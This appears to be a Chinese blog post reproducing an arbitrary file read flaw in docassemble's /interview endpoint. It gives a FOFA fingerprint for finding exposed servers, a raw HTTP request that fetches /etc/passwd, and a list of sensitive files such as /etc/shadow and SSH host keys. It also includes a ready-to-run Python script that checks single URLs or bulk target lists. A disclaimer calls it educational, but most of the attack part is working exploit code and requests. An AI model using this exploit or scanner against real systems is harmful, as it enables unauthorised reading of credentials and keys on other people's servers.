【漏洞复现】docassemble——interview——任意文件读取

声明：本文档或演示材料仅供教育和教学目的使用，任何个人或组织使用本文档中的信息进行非法活动，均与本文档的作者或发布者无关。

---

漏洞描述

docassemble 是一款强大的开源工具，它让自动化生成和定制复杂法律文档变得易如反掌。通过这个平台，用户可以构建交互式访谈，收集必要的信息，并自动生成符合需求的文件。无论你是律师、行政助理还是研究人员，docassemble 都能极大地提高你的工作效率。其接口interview存在任意文件读取漏洞，攻击者可通过该漏洞获取系统敏感文件。

漏洞复现

1）信息收集
fofa：icon_hash="-575790689"

失败是成功之母，不失败怎么能成功？

2）构造数据包

GET /interview?i=/etc/passwd HTTP/1.1
Host:ip

回显内容包含passwd文件，验证成功，存在任意文件读取漏洞。

在Linux系统中，有许多文件被认为是敏感的，因为它们包含了系统配置、用户数据和其他重要信息。以下是一些常见的Linux系统中的敏感文件：

1. /etc/passwd - 存储用户账户信息。
2. /etc/shadow - 存储加密的用户密码。
3. /etc/group - 存储用户组信息。
4. /etc/gshadow - 存储加密的用户组密码。
5. /etc/ssh/ssh_host_*_key - SSH主机密钥文件。

切记！！不要违法！！！

测试工具

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# 导入requests库，用于发送HTTP请求
import requests
# 导入argparse库，用于解析命令行参数
import argparse
# 导入time库，虽然在这段代码中未使用，但可能用于其他目的，比如等待或延迟
import time
# 从urllib3库导入InsecureRequestWarning，用于忽略SSL警告
from urllib3.exceptions import InsecureRequestWarning

# 定义打印颜色常量
RED = '\033[91m'  # 红色
RESET = '\033[0m'  # 重置颜色

# 忽略不安全请求的警告，避免在请求HTTPS时提示不安全警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# 定义检查漏洞的函数
def check_vulnerability(url):
    try:
        # 去除URL末尾的斜杠，并构造完整的攻击URL
        attack_url = url.rstrip('/') + "/interview?i=/etc/passwd"
        
        # 发送GET请求到攻击URL，不验证SSL证书，超时时间设置为10秒
        response = requests.get(attack_url, verify=False, timeout=10)
        
        # 检查HTTP响应状态码和响应体中的关键字，判断是否存在漏洞
        if response.status_code == 200 and 'root' in response.text:
            print(f"{RED}URL [{url}] 可能存在CVE-2024-27292 任意文件读取漏洞{RESET}")
        else:
            print(f"URL [{url}] 不存在漏洞")
    # 捕获请求超时异常，提示可能存在漏洞
    except requests.exceptions.Timeout:
        print(f"URL [{url}] 请求超时，可能存在漏洞")
    # 捕获其他请求异常，打印错误信息
    except requests.RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

# 定义主函数，用于解析命令行参数并调用检查函数
def main():
    # 创建ArgumentParser对象，用于解析命令行参数
    parser = argparse.ArgumentParser(description='检测目标地址是否存在CVE-2024-27292 任意文件读取漏洞')
    # 添加命令行参数，用于指定目标URL
    parser.add_argument('-u', '--url', help='指定目标地址')
    # 添加命令行参数，用于指定包含目标地址的文本文件
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    # 解析命令行参数
    args = parser.parse_args()

    # 如果指定了单个URL，则检查该URL是否存在漏洞
    if args.url:
        # 如果URL未以http://或https://开头，则添加http://前缀
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    # 如果指定了文件，则逐行读取文件中的URL并检查
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                # 如果URL未以http://或https://开头，则添加http://前缀
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

# 程序入口点
if __name__ == '__main__':
    main()

运行过程：

---

装作拥有某样品质，实际上就等于承认了自己并没有这样品质。